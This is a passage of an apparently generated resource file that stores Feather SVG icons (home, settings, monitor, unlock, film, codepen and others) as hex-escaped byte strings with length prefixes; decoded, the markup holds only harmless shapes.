\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x31\x38\
\x20\x39\x20\x31\x32\x20\x31\x35\x20\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x61\x79\x6f\x75\
\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\
\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x6f\x6d\x65\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x20\x39\x6c\x39\
\x2d\x37\x20\x39\x20\x37\x76\x31\x31\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x39\x20\x32\x32\x20\x39\x20\x31\x32\x20\x31\x35\x20\
\x31\x32\x20\x31\x35\x20\x32\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x03\xf3\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x74\x74\x69\
\x6e\x67\x73\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x39\x2e\x34\x20\x31\x35\x61\x31\x2e\
\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x2e\x33\
\x33\x20\x31\x2e\x38\x32\x6c\x2e\x30\x36\x2e\x30\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x30\x20\x32\x2e\x38\x33\x20\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\x33\x20\x30\x6c\
\x2d\x2e\x30\x36\x2d\x2e\x30\x36\x61\x31\x2e\x36\x35\x20\x31\x2e\
\x36\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x38\x32\x2d\x2e\x33\
\x33\x20\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\
\x30\x2d\x31\x20\x31\x2e\x35\x31\x56\x32\x31\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x20\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2d\x32\x76\x2d\x2e\x30\x39\x41\x31\x2e\x36\
\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x39\x20\x31\
\x39\x2e\x34\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\
\x30\x20\x30\x2d\x31\x2e\x38\x32\x2e\x33\x33\x6c\x2d\x2e\x30\x36\
\x2e\x30\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\
\x38\x33\x20\x30\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x30\
\x2d\x32\x2e\x38\x33\x6c\x2e\x30\x36\x2d\x2e\x30\x36\x61\x31\x2e\
\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x2e\x33\
\x33\x2d\x31\x2e\x38\x32\x20\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\
\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x35\x31\x2d\x31\x48\x33\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x20\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x2e\x30\x39\x41\
\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\
\x34\x2e\x36\x20\x39\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\
\x30\x20\x30\x20\x30\x2d\x2e\x33\x33\x2d\x31\x2e\x38\x32\x6c\x2d\
\x2e\x30\x36\x2d\x2e\x30\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x30\x2d\x32\x2e\x38\x33\x20\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2e\x38\x33\x20\x30\x6c\x2e\x30\x36\x2e\x30\x36\
\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x2e\x38\x32\x2e\x33\x33\x48\x39\x61\x31\x2e\x36\x35\x20\
\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x31\x2d\x31\x2e\x35\
\x31\x56\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\
\x2e\x30\x39\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\
\x30\x20\x30\x20\x31\x20\x31\x2e\x35\x31\x20\x31\x2e\x36\x35\x20\
\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x38\x32\x2d\
\x2e\x33\x33\x6c\x2e\x30\x36\x2d\x2e\x30\x36\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x2e\x38\x33\x20\x30\x20\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x30\x20\x32\x2e\x38\x33\x6c\x2d\x2e\
\x30\x36\x2e\x30\x36\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\
\x30\x20\x30\x20\x30\x2d\x2e\x33\x33\x20\x31\x2e\x38\x32\x56\x39\
\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x2e\x35\x31\x20\x31\x48\x32\x31\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x20\x32\x20\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x68\x2d\x2e\x30\x39\x61\x31\x2e\x36\x35\
\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x35\x31\
\x20\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xa3\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x76\x69\x64\
\x65\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\
\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x38\x22\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\
\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\
\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x6e\x69\x74\
\x6f\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\
\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\
\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\
\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x6e\x6c\x6f\x63\
\x6b\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x31\x31\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x37\x20\x31\x31\
\x56\x37\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x39\x2e\x39\
\x2d\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x47\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6c\x64\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\x34\x68\x38\
\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x34\x20\x34\x20\x34\
\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x36\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x36\x20\x31\x32\x68\x39\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x20\x34\x20\x34\x20\x34\x20\x34\x20\x30\x20\x30\x20\x31\
\x2d\x34\x20\x34\x48\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x6d\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\
\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\x78\x3d\x22\x32\x2e\
\x31\x38\x22\x20\x72\x79\x3d\x22\x32\x2e\x31\x38\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x37\
\x22\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x37\x22\x20\
\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\
\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\
\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x22\x20\x79\x31\x3d\x22\x37\x22\x20\x78\x32\x3d\x22\x37\
\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\
\x22\x31\x37\x22\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\
\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x37\x22\
\x20\x78\x32\x3d\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x37\x22\x20\x78\x32\x3d\
\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe6\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x64\x65\x70\
\x65\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x32\x20\x32\x20\x32\x32\x20\x38\x2e\x35\
\x20\x32\x32\x20\x31\x35\x2e\x35\x20\x31\x32\x20\x32\x32\x20\x32\
\x20\x31\x35\x2e\x35\x20\x32\x20\x38\x2e\x35\x20\x31\x32\x20\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\
\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\
\x2e\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x32\x20\
\x38\x2e\x35\x20\x31\x32\x20\x31\x35\x2e\x35\x20\x32\x20\x38\x2e\
\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x32\x20\x31\x35\x2e\x35\x20\x31\x32\x20\x38\x2e\x35\x20\x32\x32\
